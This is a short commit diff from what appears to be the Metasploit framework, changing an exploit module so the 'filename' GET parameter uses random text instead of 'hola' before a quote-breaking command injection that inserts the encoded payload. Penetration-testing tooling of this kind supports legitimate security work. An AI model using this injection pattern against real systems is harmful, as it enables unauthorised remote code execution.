Random text

unstable
sinn3r 2012-07-26 15:14:02 -05:00
parent 6c3b05f1c4
commit e483af64e4
1 changed files with 1 additions and 1 deletions

View File

@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => target_uri.path,
'method' => 'GET',
'vars_get' => {
'filename' => "hola\";#{payload.encoded};\"",
'filename' => "#{Rex::Text.rand_text_alpha(4)}\";#{payload.encoded};\"",
'stage' => '0'
}
})